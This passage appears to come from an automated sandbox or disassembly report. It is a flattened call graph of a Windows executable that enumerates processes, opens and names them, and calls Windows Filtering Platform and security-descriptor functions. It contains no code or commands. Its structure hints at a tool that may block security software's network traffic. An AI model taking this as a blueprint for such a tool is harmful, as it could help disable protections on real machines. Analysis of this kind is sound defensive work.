7ff764cce4e0 9670->9683 9674 7ff764cccc16 9673->9674 9815 7ff764cccacd 9674->9815 9678 7ff764ccd8b9 9677->9678 9845 7ff764cccdd0 9678->9845 9681 7ff764ccca90 fputwc 9682 7ff764ccd925 9681->9682 9684 7ff764cce556 9683->9684 9685 7ff764cce6b4 9684->9685 9704 7ff764ccd120 9684->9704 9747 7ff764ccf663 9684->9747 9758 7ff764cce34c 9685->9758 9688 7ff764cce5ee 9689 7ff764cce6ac 9688->9689 9692 7ff764cce6e0 9688->9692 9754 7ff764ccf717 9689->9754 9761 7ff764cce320 9692->9761 9693 7ff764ccee37 9696 7ff764ccf803 6 API calls 9693->9696 9694 7ff764ccebc1 9703 7ff764ccf717 4 API calls 9694->9703 9708 7ff764cceaae 9694->9708 9698 7ff764ccee44 9696->9698 9697 7ff764cced9f 9697->9693 9701 7ff764ccee18 9697->9701 9768 7ff764ccf949 9697->9768 9706 7ff764ccf949 6 API calls 9698->9706 9714 7ff764ccee5c 9698->9714 9699 7ff764ccf717 4 API calls 9699->9704 9701->9693 9702 7ff764ccf949 6 API calls 9701->9702 9702->9693 9712 7ff764ccf3c7 9703->9712 9704->9664 9704->9665 9706->9714 9708->9699 9710 7ff764ccf3de 9713 7ff764ccf717 4 API calls 9710->9713 9712->9708 9712->9710 9717 7ff764ccf717 4 API calls 9712->9717 9713->9708 9715 7ff764cceee9 9714->9715 9787 7ff764ccfa57 9714->9787 9719 7ff764ccfa57 6 API calls 9715->9719 9723 7ff764ccef05 9715->9723 9716 7ff764ccf717 4 API calls 9716->9701 9717->9710 9719->9723 9720 7ff764ccefdb 9722 7ff764ccefe6 9720->9722 9736 7ff764ccf2cd 9720->9736 9721 7ff764ccef6e 9721->9694 9726 7ff764ccf763 6 API calls 9721->9726 9727 7ff764ccfa57 6 API calls 9722->9727 9728 7ff764cceff7 9722->9728 9733 7ff764ccef22 9723->9733 9793 7ff764ccf763 9723->9793 9726->9694 9727->9728 9729 7ff764ccf663 6 API calls 9728->9729 9743 7ff764ccf030 9728->9743 9732 7ff764ccf00e 9729->9732 9730 7ff764ccf763 6 API calls 9730->9733 9731 7ff764ccf321 9731->9694 9737 7ff764ccfa57 6 API calls 9731->9737 9735 7ff764ccfa57 6 API calls 9732->9735 9733->9720 9733->9721 9734 7ff764ccf763 6 API calls 9734->9736 9735->9743 9736->9731 9736->9734 9737->9694 9739 7ff764ccf717 4 API calls 9739->9743 9740 7ff764ccf119 9741 7ff764ccf1b4 9740->9741 9746 7ff764ccf134 9740->9746 9741->9694 9742 7ff764ccfa57 6 API calls 9741->9742 9742->9694 9743->9694 9743->9731 9743->9739 9743->9740 9744 7ff764ccf763 6 API calls 9743->9744 9799 7ff764ccfb9a 9743->9799 9744->9743 9745 7ff764ccf763 6 API calls 9745->9746 9746->9694 9746->9745 9806 7ff764ccf560 9747->9806 9750 7ff764ccf68b 9812 7ff764ccf605 9750->9812 9751 7ff764ccf6ec malloc 9751->9750 9752 7ff764ccf706 9751->9752 9752->9688 9755 7ff764ccf724 9754->9755 9756 7ff764ccf73b 9754->9756 9757 7ff764ccf560 4 API calls 9755->9757 9756->9685 9757->9756 9759 7ff764cce320 6 API calls 9758->9759 9760 7ff764cce360 9759->9760 9760->9704 9762 7ff764cce32c 9761->9762 9763 7ff764ccf663 6 API calls 9762->9763 9764 7ff764cce340 9763->9764 9764->9694 9764->9697 9764->9708 9765 7ff764ccf803 9764->9765 9766 7ff764ccf663 6 API calls 9765->9766 9767 7ff764ccf814 9766->9767 9767->9697 9769 7ff764ccf973 9768->9769 9770 7ff764ccf95d 9768->9770 9771 7ff764ccedfd 9769->9771 9773 7ff764ccf560 4 API calls 9769->9773 9780 7ff764ccf9d6 9769->9780 9772 7ff764ccf763 6 API calls 9770->9772 9783 7ff764ccf829 9771->9783 9772->9769 9774 7ff764ccf99e 9773->9774 9775 7ff764ccf9b4 9774->9775 9776 7ff764ccf803 6 API calls 9774->9776 9775->9771 9778 7ff764ccf605 LeaveCriticalSection 9775->9778 9776->9775 9777 7ff764ccf560 4 API calls 9777->9780 9778->9780 9779 7ff764ccf717 4 API calls 9779->9780 9780->9771 9780->9777 9780->9779 9781 7ff764ccf829 6 API calls 9780->9781 9782 7ff764ccf605 LeaveCriticalSection 9780->9782 9781->9780 9782->9780 9784 7ff764ccf847 9783->9784 9785 7ff764ccf663 6 API calls 9784->9785 9786 7ff764ccee0b 9785->9786 9786->9716 9788 7ff764ccfa80 9787->9788 9789 7ff764ccf663 6 API calls 9788->9789 9792 7ff764ccfa90 9789->9792 9790 7ff764ccfb42 9790->9715 9791 7ff764ccf717 4 API calls 9791->9790 9792->9790 9792->9791 9795 7ff764ccf77e 9793->9795 9794 7ff764ccef43 9794->9730 9794->9733 9795->9794 9796 7ff764ccf663 6 API calls 9795->9796 9797 7ff764ccf7b5 9796->9797 9797->9794 9798 7ff764ccf717 4 API calls 9797->9798 9798->9794 9800 7ff764ccfbaf 9799->9800 9801 7ff764ccfbb3 9800->9801 9802 7ff764ccfbd0 9800->9802 9803 7ff764ccf663 6 API calls 9801->9803 9804 7ff764ccf663 6 API calls 9802->9804 9805 7ff764ccfbba 9803->9805 9804->9805 9805->9743 9807 7ff764ccf573 EnterCriticalSection 9806->9807 9809 7ff764ccf591 9806->9809 9807->9809 9808 7ff764ccf5a4 InitializeCriticalSection InitializeCriticalSection 9808->9809 9809->9807 9809->9808 9810 7ff764ccf5ec Sleep 9809->9810 9811 7ff764ccf5fe 9809->9811 9810->9809 9811->9750 9811->9751 9813 7ff764ccf625 9812->9813 9814 7ff764ccf60e LeaveCriticalSection 9812->9814 9813->9752 9814->9813 9816 7ff764cccae7 9815->9816 9817 7ff764cccb4c 9816->9817 9818 7ff764cccafc 9816->9818 9821 7ff764cccb51 9817->9821 9824 7ff764ccca90 fputwc 9817->9824 9819 7ff764cccb04 fwprintf 9818->9819 9820 7ff764cccb27 fwprintf 9818->9820 9823 7ff764cccb39 9819->9823 9820->9823 9825 7ff764cccb8f strlen 9821->9825 9826 7ff764cccbd9 9821->9826 9829 7ff764ccca90 fputwc 9821->9829 9823->9668 9824->9817 9830 7ff764cd026c 9825->9830 9826->9823 9828 7ff764ccca90 fputwc 9826->9828 9828->9826 9829->9821 9831 7ff764cd0282 ___mb_cur_max_func ___lc_codepage_func 9830->9831 9832 7ff764cd027d 9830->9832 9833 7ff764cd02bb 9831->9833 9832->9831 9836 7ff764cd0150 9833->9836 9837 7ff764cd0170 9836->9837 9838 7ff764cd018c 9836->9838 9837->9838 9839 7ff764cd0254 9837->9839 9840 7ff764cd01df IsDBCSLeadByteEx 9837->9840 9843 7ff764cd01aa 9837->9843 9838->9821 9839->9838 9841 7ff764cd021f MultiByteToWideChar 9839->9841 9840->9839 9840->9843 9841->9838 9844 7ff764cd0244 _errno 9841->9844 9842 7ff764cd01c6 MultiByteToWideChar 9842->9838 9842->9844 9843->9838 9843->9842 9844->9838 9848 7ff764cccdec 9845->9848 9846 7ff764ccce3d 9847 7ff764ccca90 fputwc 9846->9847 9853 7ff764ccceda 9846->9853 9847->9853 9848->9846 9850 7ff764ccca90 fputwc 9848->9850 9849 7ff764cccee0 9851 7ff764cccf16 9849->9851 9852 7ff764cccee9 9849->9852 9850->9848 9856 7ff764ccca90 fputwc 9851->9856 9857 7ff764cccf6b 9851->9857 9861 7ff764ccccd9 2 API calls 9851->9861 9854 7ff764ccca90 fputwc 9852->9854 9853->9849 9855 7ff764ccca90 fputwc 9853->9855 9854->9857 9855->9853 9856->9851 9864 7ff764cccf7f 9857->9864 9865 7ff764cccc72 9857->9865 9859 7ff764cccf97 9860 7ff764cccfbf 9859->9860 9863 7ff764ccca90 fputwc 9859->9863 9860->9681 9861->9851 9862 7ff764ccca90 fputwc 9862->9864 9863->9859 9864->9859 9864->9862 9866 7ff764cccc80 localeconv 9865->9866 9867 7ff764ccccae 9865->9867 9868 7ff764cd026c 6 API calls 9866->9868 9868->9867 8897 7ff764cc12fd 8900 7ff764cc1131 8897->8900 8901 7ff764cc115a 8900->8901 8902 7ff764cc1172 8901->8902 8903 7ff764cc1169 Sleep 8901->8903 8904 7ff764cc1194 8902->8904 8905 7ff764cc1188 _amsg_exit 8902->8905 8903->8901 8906 7ff764cc11b5 8904->8906 8907 7ff764cc119a _initterm 8904->8907 8905->8906 8908 7ff764cc11c5 _initterm 8906->8908 8909 7ff764cc11de 8906->8909 8907->8906 8908->8909 8921 7ff764cca96b 8909->8921 8912 7ff764cc122e 8913 7ff764cc1233 malloc 8912->8913 8914 7ff764cc1253 8913->8914 8915 7ff764cc1283 8914->8915 8916 7ff764cc1258 strlen malloc 8914->8916 8932 7ff764cc14b8 8915->8932 8916->8914 8918 7ff764cc12c4 8919 7ff764cc12e3 _cexit 8918->8919 8920 7ff764cc12e8 8918->8920 8919->8920 8922 7ff764cc1208 SetUnhandledExceptionFilter 8921->8922 8924 7ff764cca989 8921->8924 8922->8912 8923 7ff764ccab8f 8923->8922 8926 7ff764ccabb7 VirtualProtect 8923->8926 8924->8923 8925 7ff764ccaa00 8924->8925 8929 7ff764ccaa3f 8924->8929 8925->8923 8927 7ff764ccaa1e 8925->8927 8926->8923 8927->8925 8936 7ff764cca824 8927->8936 8929->8923 8930 7ff764ccaaaa 8929->8930 8931 7ff764cca824 3 API calls 8930->8931 8931->8929 8933 7ff764cc14c8 8932->8933 8943 7ff764cc1486 8933->8943 8937 7ff764cca84a 8936->8937 8938 7ff764cca8af VirtualQuery 8937->8938 8940 7ff764cca953 8937->8940 8939 7ff764cca8d8 8938->8939 8939->8940 8941 7ff764cca907 VirtualProtect 8939->8941 8940->8927 8941->8940 8942 7ff764cca93f GetLastError 8941->8942 8942->8940 8950 7ff764cc1360 8943->8950 8948 7ff764cc1496 8969 7ff764cc1432 8948->8969 9000 7ff764cc19c0 GetModuleHandleExA 8950->9000 8955 7ff764cc1393 9015 7ff764cc168c InitializeCriticalSectionAndSpinCount 8955->9015 8959 7ff764cc13a1 8959->8948 8977 7ff764cc9621 8959->8977 8960 7ff764cc19c0 26 API calls 8961 7ff764cc13cb 8960->8961 8962 7ff764cc6c99 30 API calls 8961->8962 8963 7ff764cc13e7 8962->8963 9062 7ff764cc6497 8963->9062 8966 7ff764cc13f6 8966->8959 9068 7ff764cc97f2 8966->9068 9278 7ff764cc193c 8969->9278 8972 7ff764cc1452 8975 7ff764cc1475 8972->8975 8976 7ff764cc145e GetProcessHeap HeapFree 8972->8976 8973 7ff764cc1446 9285 7ff764cc6263 8973->9285 8975->8918 8976->8975 8978 7ff764cc9650 8977->8978 8979 7ff764cc9656 8978->8979 8980 7ff764cc96b0 8978->8980 9299 7ff764cc76d0 8979->9299 8981 7ff764cc14e2 24 API calls 8980->8981 8983 7ff764cc96c6 8981->8983 8983->8948 8985 7ff764cc966e 8987 7ff764cc9672 8985->8987 8988 7ff764cc9d2d 25 API calls 8985->8988 8986 7ff764cc76d0 26 API calls 8986->8985 8989 7ff764cc96fc FwpmEngineClose0 8987->8989 9313 7ff764cc9d2d 8987->9313 8990 7ff764cc96ef 8988->8990 8989->8983 8990->8989 8993 7ff764cc9722 8990->8993 9323 7ff764cc855d 8990->9323 8993->8989 8995 7ff764cc9d2d 25 API calls 8993->8995 8994 7ff764cc96ac 8994->8989 8997 7ff764cc9737 8995->8997 8997->8987 8997->8989 9349 7ff764cc8cfc 8997->9349 9001 7ff764cc19f2 GetLastError 9000->9001 9002 7ff764cc1376 9000->9002 9116 7ff764cc14e2 9001->9116 9004 7ff764cc6c99 9002->9004 9005 7ff764cc6cdf 9004->9005 9006 7ff764cc6caf 9004->9006 9008 7ff764cc14e2 24 API calls 9005->9008 9194 7ff764cc6b9b 9006->9194 9013 7ff764cc138f 9008->9013 9010 7ff764cc6d0f strlen 9011 7ff764cc6d21 9010->9011 9012 7ff764cc6d37 strcat strlen 9010->9012 9011->9012 9014 7ff764cc6d26 strlen 9011->9014 9012->9013 9013->8955 9039 7ff764cc5e6f 9013->9039 9014->9012 9016 7ff764cc17e0 GetLastError 9015->9016 9017 7ff764cc16ba 9015->9017 9019 7ff764cc14e2 24 API calls 9016->9019 9018 7ff764cc19c0 26 API calls 9017->9018 9020 7ff764cc16d6 9018->9020 9024 7ff764cc17b9 9019->9024 9021 7ff764cc6b9b 26 API calls 9020->9021 9022 7ff764cc16ea 9021->9022 9023 7ff764cc16f4 strlen 9022->9023 9022->9024 9026 7ff764cc1723 9023->9026 9027 7ff764cc170d 9023->9027 9025 7ff764cc14e2 24 API calls 9024->9025 9028 7ff764cc139d 9025->9028 9030 7ff764cc1748 strlen fopen 9026->9030 9031 7ff764cc1728 strcat strlen 9026->9031 9027->9026 9029 7ff764cc1712 strlen 9027->9029 9028->8959 9028->8960 9029->9026 9032 7ff764cc1797 9030->9032 9033 7ff764cc18ad 9030->9033 9031->9030 9035 7ff764cc14e2 24 API calls 9032->9035 9034 7ff764cc14e2 24 API calls 9033->9034 9034->9024 9036 7ff764cc17b1 9035->9036 9036->9024 9037 7ff764cc191d 9036->9037 9038 7ff764cc14e2 24 API calls 9037->9038 9038->9028 9040 7ff764cc5f72 9039->9040 9041 7ff764cc5e86 9039->9041 9044 7ff764cc14e2 24 API calls 9040->9044 9042 7ff764cc5fa2 9041->9042 9043 7ff764cc5e8f CreateFileA 9041->9043 9045 7ff764cc14e2 24 API calls 9042->9045 9046 7ff764cc5fd5 GetLastError 9043->9046 9047 7ff764cc5eda LockFileEx 9043->9047 9048 7ff764cc5f27 9044->9048 9045->9048 9049 7ff764cc14e2 24 API calls 9046->9049 9050 7ff764cc60ba GetLastError 9047->9050 9051 7ff764cc5f0e 9047->9051 9054 7ff764cc6239 9048->9054 9055 7ff764cc5f51 9048->9055 9059 7ff764cc5ff6 9049->9059 9053 7ff764cc14e2 24 API calls 9050->9053 9051->9048 9052 7ff764cc622b CloseHandle 9051->9052 9052->9054 9060 7ff764cc60db 9053->9060 9056 7ff764cc14e2 24 API calls 9054->9056 9057 7ff764cc14e2 24 API calls 9055->9057 9058 7ff764cc5f67 9056->9058 9057->9058 9058->8955 9059->9050 9061 7ff764cc6163 9059->9061 9060->9061 9061->9052 9063 7ff764cc64a0 GetFileAttributesA 9062->9063 9064 7ff764cc64b5 9062->9064 9065 7ff764cc64e5 GetLastError 9063->9065 9067 7ff764cc13ef 9063->9067 9066 7ff764cc14e2 24 API calls 9064->9066 9065->9067 9066->9067 9067->8966 9090 7ff764cc433b 9067->9090 9069 7ff764cc98a5 9068->9069 9070 7ff764cc981a 9068->9070 9071 7ff764cc14e2 24 API calls 9069->9071 9222 7ff764cc45d5 9070->9222 9085 7ff764cc9833 9071->9085 9073 7ff764cc9854 9075 7ff764cc9b92 9073->9075 9079 7ff764cc987c 9073->9079 9074 7ff764cc983d GetProcessHeap HeapFree 9074->9073 9076 7ff764cc14e2 24 API calls 9075->9076 9078 7ff764cc9bb4 9076->9078 9077 7ff764cc995d GetProcessHeap HeapAlloc 9080 7ff764cc99d0 9077->9080 9087 7ff764cc999a 9077->9087 9089 7ff764cc14e2 24 API calls 9078->9089 9081 7ff764cc14e2 24 API calls 9079->9081 9083 7ff764cc14e2 24 API calls 9080->9083 9084 7ff764cc9892 9081->9084 9083->9087 9084->8959 9085->9073 9085->9074 9086 7ff764cc9ab3 strncpy strncpy 9086->9087 9087->9085 9087->9086 9088 7ff764cc9b28 strncpy 9087->9088 9088->9087 9089->9078 9091 7ff764cc43e5 9090->9091 9092 7ff764cc435a 9090->9092 9095 7ff764cc14e2 24 API calls 9091->9095 9093 7ff764cc4415 9092->9093 9094 7ff764cc4363 fopen 9092->9094 9096 7ff764cc14e2 24 API calls 9093->9096 9097 7ff764cc4374 9094->9097 9098 7ff764cc4448 _errno 9094->9098 9100 7ff764cc4388 9095->9100 9096->9100 9099 7ff764cc44d6 fwrite 9097->9099 9097->9100 9101 7ff764cc14e2 24 API calls 9098->9101 9103 7ff764cc44f8 _errno 9099->9103 9104 7ff764cc44ee 9099->9104 9107 7ff764cc459a 9100->9107 9108 7ff764cc43bb 9100->9108 9102 7ff764cc4470 _errno 9101->9102 9105 7ff764cc4479 9102->9105 9106 7ff764cc44bd _errno 9102->9106 9109 7ff764cc14e2 24 API calls 9103->9109 9104->9103 9105->9106 9106->9099 9110 7ff764cc14e2 24 API calls 9107->9110 9111 7ff764cc14e2 24 API calls 9108->9111 9112 7ff764cc4520 _errno 9109->9112 9113 7ff764cc43d8 9110->9113 9111->9113 9114 7ff764cc4529 9112->9114 9115 7ff764cc456d _errno 9112->9115 9113->8966 9114->9115 9115->9107 9117 7ff764cc14f0 9116->9117 9127 7ff764ccb210 9117->9127 9120 7ff764cc1577 fwrite fflush 9123 7ff764cc15a0 9120->9123 9121 7ff764cc15ac EnterCriticalSection 9122 7ff764cc15c6 LeaveCriticalSection 9121->9122 9124 7ff764cc15e3 9121->9124 9122->9120 9123->9002 9125 7ff764cc161d CopyFileA 9124->9125 9126 7ff764cc1655 9125->9126 9126->9122 9128 7ff764ccb235 9127->9128 9129 7ff764ccb21e 9127->9129 9131 7ff764ccc2d0 19 API calls 9128->9131 9133 7ff764ccc2d0 9129->9133 9132 7ff764cc1549 9131->9132 9132->9120 9132->9121 9132->9123 9136 7ff764ccc307 9133->9136 9134 7ff764ccca67 9134->9132 9135 7ff764ccb3e7 fputc 9135->9136 9136->9134 9136->9135 9138 7ff764ccc1ae 9136->9138 9139 7ff764ccc1c0 9138->9139 9156 7ff764ccb2d0 9139->9156 9142 7ff764ccc21f 9145 7ff764ccc290 9142->9145 9148 7ff764ccc235 9142->9148 9143 7ff764ccc20d 9160 7ff764ccb5da 9143->9160 9146 7ff764ccc294 9145->9146 9147 7ff764ccc29b strlen 9145->9147 9188 7ff764ccc08a 9146->9188 9147->9146 9149 7ff764ccc241 strlen 9148->9149 9150 7ff764ccc239 9148->9150 9149->9150 9164 7ff764ccb721 9150->9164 9152 7ff764ccc21a 9152->9136 9154 7ff764ccc274 9154->9152 9184 7ff764ccb3e7 9154->9184 9157 7ff764ccb2ee 9156->9157 9158 7ff764cce4e0 6 API calls 9157->9158 9159 7ff764ccb3e1 9158->9159 9159->9142 9159->9143 9161 7ff764ccb5f0 9160->9161 9161->9161 9162 7ff764ccb4fe fputc 9161->9162 9163 7ff764ccb646 9162->9163 9163->9152 9165 7ff764ccb73d 9164->9165 9166 7ff764ccb78e 9165->9166 9169 7ff764ccb3e7 fputc 9165->9169 9167 7ff764ccb3e7 fputc 9166->9167 9172 7ff764ccb82b 9166->9172 9167->9172 9168 7ff764ccb831 9170 7ff764ccb867 9168->9170 9171 7ff764ccb83a 9168->9171 9169->9165 9175 7ff764ccb3e7 fputc 9170->9175 9176 7ff764ccb8bc 9170->9176 9181 7ff764ccb420 fputc WideCharToMultiByte _errno ___mb_cur_max_func ___lc_codepage_func 9170->9181 9173 7ff764ccb3e7 fputc 9171->9173 9172->9168 9174 7ff764ccb3e7 fputc 9172->9174 9173->9176 9174->9172 9175->9170 9177 7ff764ccb64c 11 API calls 9176->9177 9182 7ff764ccb8d0 9176->9182 9177->9182 9178 7ff764ccb8e8 9179 7ff764ccb910 9178->9179 9183 7ff764ccb3e7 fputc 9178->9183 9179->9154 9180 7ff764ccb3e7 fputc 9180->9182 9181->9170 9182->9178 9182->9180 9183->9178 9185 7ff764ccb3f8 9184->9185 9186 7ff764ccb410 9185->9186 9187 7ff764ccb409 fputc 9185->9187 9186->9154 9187->9186 9189 7ff764ccc0ac 9188->9189 9190 7ff764ccb721 11 API calls 9189->9190 9191 7ff764ccc0f7 9190->9191 9192 7ff764ccb3e7 fputc 9191->9192 9193 7ff764ccc118 9192->9193 9195 7ff764cc6be2 9194->9195 9196 7ff764cc6bac 9194->9196 9197 7ff764cc14e2 24 API calls 9195->9197 9198 7ff764cc6c12 9196->9198 9199 7ff764cc6bb1 9196->9199 9205 7ff764cc6bc7 9197->9205 9200 7ff764cc14e2 24 API calls 9198->9200 9201 7ff764cc6c42 9199->9201 9202 7ff764cc6bba 9199->9202 9200->9205 9203 7ff764cc14e2 24 API calls 9201->9203 9207 7ff764cc6a5c 9202->9207 9203->9205 9205->9010 9205->9013 9208 7ff764cc6a76 9207->9208 9209 7ff764cc6b05 9207->9209 9211 7ff764cc6a7f 9208->9211 9212 7ff764cc6b35 9208->9212 9210 7ff764cc14e2 24 API calls 9209->9210 9220 7ff764cc6ac1 9210->9220 9213 7ff764cc6b68 9211->9213 9214 7ff764cc6a88 GetModuleFileNameA GetLastError 9211->9214 9215 7ff764cc14e2 24 API calls 9212->9215 9217 7ff764cc14e2 24 API calls 9213->9217 9216 7ff764cc6aa2 9214->9216 9215->9220 9218 7ff764cc6afa 9216->9218 9219 7ff764cc14e2 24 API calls 9216->9219 9217->9220 9218->9205 9219->9220 9221 7ff764cc14e2 24 API calls 9220->9221 9221->9218 9223 7ff764cc4675 9222->9223 9224 7ff764cc45f7 9222->9224 9225 7ff764cc14e2 24 API calls 9223->9225 9226 7ff764cc4600 9224->9226 9227 7ff764cc46ba 9224->9227 9239 7ff764cc46b0 9225->9239 9229 7ff764cc4610 fopen 9226->9229 9230 7ff764cc46ed 9226->9230 9228 7ff764cc14e2 24 API calls 9227->9228 9228->9239 9231 7ff764cc4720 _errno 9229->9231 9232 7ff764cc462b fseek 9229->9232 9235 7ff764cc14e2 24 API calls 9230->9235 9236 7ff764cc14e2 24 API calls 9231->9236 9233 7ff764cc4646 _errno 9232->9233 9234 7ff764cc47f3 9232->9234 9238 7ff764cc14e2 24 API calls 9233->9238 9246 7ff764cc4802 9234->9246 9247 7ff764cc482b _errno 9234->9247 9235->9239 9237 7ff764cc4742 _errno 9236->9237 9240 7ff764cc478f _errno 9237->9240 9241 7ff764cc474b 9237->9241 9242 7ff764cc4668 _errno 9238->9242 9243 7ff764cc14e2 24 API calls 9239->9243 9271 7ff764cc481e 9240->9271 9241->9240 9242->9223 9244 7ff764cc47da _errno 9242->9244 9245 7ff764cc4b78 9243->9245 9244->9271 9245->9077 9245->9085 9251 7ff764cc48b3 fseek 9246->9251 9246->9271 9250 7ff764cc14e2 24 API calls 9247->9250 9248 7ff764cc4b35 9248->9239 9253 7ff764cc4ba2 9248->9253 9249 7ff764cc4b2d fclose 9249->9248 9252 7ff764cc484d _errno 9250->9252 9254 7ff764cc4941 _errno 9251->9254 9255 7ff764cc48cd 9251->9255 9257 7ff764cc4856 9252->9257 9258 7ff764cc489a _errno 9252->9258 9256 7ff764cc14e2 24 API calls 9253->9256 9260 7ff764cc14e2 24 API calls 9254->9260 9259 7ff764cc49c9 GetProcessHeap HeapAlloc 9255->9259 9276 7ff764cc48df 9255->9276 9256->9245 9257->9258 9258->9271 9261 7ff764cc49f1 9259->9261 9259->9276 9262 7ff764cc4963 _errno 9260->9262 9263 7ff764cc14e2 24 API calls 9261->9263 9264 7ff764cc49b0 _errno 9262->9264 9265 7ff764cc496c 9262->9265 9266 7ff764cc4a07 9263->9266 9264->9271 9265->9264 9266->9276 9267 7ff764cc4a9e 9269 7ff764cc4aa9 9267->9269 9270 7ff764cc14e2 24 API calls 9267->9270 9268 7ff764cc490d fread 9268->9267 9268->9276 9269->9271 9273 7ff764cc4ab4 GetProcessHeap HeapFree 9269->9273 9270->9269 9271->9248 9271->9249 9272 7ff764cc4a0c _errno 9274 7ff764cc14e2 24 API calls 9272->9274 9273->9271 9275 7ff764cc4a2e _errno 9274->9275 9275->9276 9277 7ff764cc4a7b _errno 9275->9277 9276->9267 9276->9268 9276->9271 9276->9272 9276->9277 9277->9276 9279 7ff764cc1956 fclose 9278->9279 9280 7ff764cc195b 9278->9280 9279->9280 9281 7ff764cc1983 DeleteCriticalSection 9280->9281 9282 7ff764cc1989 9280->9282 9281->9282 9283 7ff764cc14e2 24 API calls 9282->9283 9284 7ff764cc143c 9283->9284 9284->8972 9284->8973 9286 7ff764cc6272 9285->9286 9287 7ff764cc62e4 9285->9287 9288 7ff764cc627f UnlockFileEx 9286->9288 9289 7ff764cc6315 9286->9289 9290 7ff764cc14e2 24 API calls 9287->9290 9292 7ff764cc6372 GetLastError 9288->9292 9293 7ff764cc62b9 CloseHandle 9288->9293 9291 7ff764cc14e2 24 API calls 9289->9291 9298 7ff764cc630d 9290->9298 9291->9298 9294 7ff764cc14e2 24 API calls 9292->9294 9295 7ff764cc14e2 24 API calls 9293->9295 9294->9298 9296 7ff764cc62d8 9295->9296 9296->8972 9297 7ff764cc14e2 24 API calls 9297->9296 9298->9297 9300 7ff764cc7785 9299->9300 9301 7ff764cc7789 9300->9301 9302 7ff764cc77cd 9300->9302 9304 7ff764cc77c6 9301->9304 9305 7ff764cc77ea 9301->9305 9303 7ff764cc14e2 24 API calls 9302->9303 9311 7ff764cc77e3 9303->9311 9307 7ff764cc7800 9304->9307 9309 7ff764cc7865 wcscmp 9304->9309 9306 7ff764cc14e2 24 API calls 9305->9306 9306->9307 9308 7ff764cc7817 FwpmProviderDestroyEnumHandle0 9307->9308 9310 7ff764cc788a 9308->9310 9308->9311 9309->9304 9310->9311 9312 7ff764cc14e2 24 API calls 9310->9312 9311->8985 9311->8986 9312->9311 9375 7ff764cc9bb9 9313->9375 9316 7ff764cc9537 9317 7ff764cc9bb9 25 API calls 9316->9317 9320 7ff764cc9566 9317->9320 9318 7ff764cc960d 9318->8994 9320->9318 9322 7ff764cc14e2 24 API calls 9320->9322 9392 7ff764cca1f1 9320->9392 9398 7ff764cc929a inet_addr ntohl 9320->9398 9322->9320 9324 7ff764cc9bb9 25 API calls 9323->9324 9325 7ff764cc8599 9324->9325 9326 7ff764cc86c1 GetLastError 9325->9326 9327 7ff764cc85dc 9325->9327 9333 7ff764cc86df 9325->9333 9328 7ff764cc14e2 24 API calls 9326->9328 9329 7ff764cc87a3 GetLastError 9327->9329 9348 7ff764cc860e 9327->9348 9328->9333 9331 7ff764cc87b4 9329->9331 9329->9348 9330 7ff764cc8ca5 CloseHandle 9330->9333 9332 7ff764cc14e2 24 API calls 9331->9332 9332->9348 9333->8993 9334 7ff764cca1f1 29 API calls 9334->9348 9335 7ff764cc88cd OpenProcess 9336 7ff764cc88ee QueryFullProcessImageNameW 9335->9336 9337 7ff764cc8a78 GetLastError 9335->9337 9339 7ff764cc892e GetLastError 9336->9339 9336->9348 9340 7ff764cc14e2 24 API calls 9337->9340 9338 7ff764cc8669 Process32Next 9341 7ff764cc867d GetLastError 9338->9341 9338->9348 9342 7ff764cc14e2 24 API calls 9339->9342 9340->9348 9341->9348 9342->9348 9344 7ff764cc14e2 24 API calls 9344->9348 9345 7ff764cc8a13 CloseHandle 9345->9348 9346 7ff764cc14e2 24 API calls 9347 7ff764cc86af 9346->9347 9347->9345 9347->9346 9348->9330 9348->9334 9348->9335 9348->9338 9348->9344 9348->9345 9348->9347 9442 7ff764cc8153 9348->9442 9350 7ff764cc9bb9 25 API calls 9349->9350 9351 7ff764cc8d38 9350->9351 9360 7ff764cc9257 9351->9360 9505 7ff764cc1cf4 9351->9505 9354 7ff764cc8d82 9356 7ff764cc8d8a 9354->9356 9357 7ff764cc1c73 26 API calls 9354->9357 9358 7ff764cc8da9 FreeLibrary 9356->9358 9356->9360 9359 7ff764cc8dc6 9357->9359 9358->9360 9359->9360 9361 7ff764cc1c73 26 API calls 9359->9361 9360->8987 9362 7ff764cc8de3 9361->9362 9362->9360 9363 7ff764cc1c73 26 API calls 9362->9363 9364 7ff764cc8e00 9363->9364 9364->9360 9365 7ff764cc1c73 26 API calls 9364->9365 9374 7ff764cc8e18 9365->9374 9366 7ff764cca1f1 29 API calls 9366->9374 9367 7ff764cc8ecc strlen 9367->9374 9368 7ff764cc8f64 GetProcessHeap HeapAlloc 9368->9374 9369 7ff764cc14e2 24 API calls 9369->9374 9370 7ff764cc8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9370->9374 9372 7ff764cc90f2 GetProcessHeap HeapFree 9372->9374 9373 7ff764cc91dc LocalFree 9373->9374 9374->9356 9374->9360 9374->9366 9374->9367 9374->9368 9374->9369 9374->9370 9374->9372 9374->9373 9521 7ff764cc795a GetProcessHeap HeapAlloc 9374->9521 9376 7ff764cc9bd1 9375->9376 9377 7ff764cc9bec 9375->9377 9378 7ff764cc9bd6 9376->9378 9379 7ff764cc9c1f 9376->9379 9380 7ff764cc14e2 24 API calls 9377->9380 9381 7ff764cc9c52 9378->9381 9383 7ff764cc9bdb 9378->9383 9382 7ff764cc14e2 24 API calls 9379->9382 9384 7ff764cc9c15 9380->9384 9385 7ff764cc14e2 24 API calls 9381->9385 9382->9384 9386 7ff764cc9cbc 9383->9386 9388 7ff764cc9c91 strcmp 9383->9388 9390 7ff764cc14e2 24 API calls 9384->9390 9385->9384 9386->9384 9387 7ff764cc9cc3 9386->9387 9389 7ff764cc14e2 24 API calls 9387->9389 9388->9383 9391 7ff764cc9689 9389->9391 9390->9391 9391->8989 9391->8994 9391->9316 9393 7ff764cca200 9392->9393 9394 7ff764cca22c 9392->9394 9405 7ff764cca0f0 9393->9405 9395 7ff764cc14e2 24 API calls 9394->9395 9397 7ff764cca217 9395->9397 9397->9320 9399 7ff764cc937a 9398->9399 9400 7ff764cc932b 9398->9400 9403 7ff764cc14e2 24 API calls 9399->9403 9401 7ff764cc934f 9400->9401 9402 7ff764cc14e2 24 API calls 9400->9402 9401->9320 9402->9401 9404 7ff764cc952d 9403->9404 9406 7ff764cca153 9405->9406 9407 7ff764cca112 9405->9407 9409 7ff764cc14e2 24 API calls 9406->9409 9417 7ff764cc9ed0 9407->9417 9411 7ff764cca12b 9409->9411 9411->9397 9412 7ff764cca183 _errno 9413 7ff764cd0568 9412->9413 9414 7ff764cca1a5 _errno 9413->9414 9414->9411 9415 7ff764cca1b4 _errno 9414->9415 9416 7ff764cc14e2 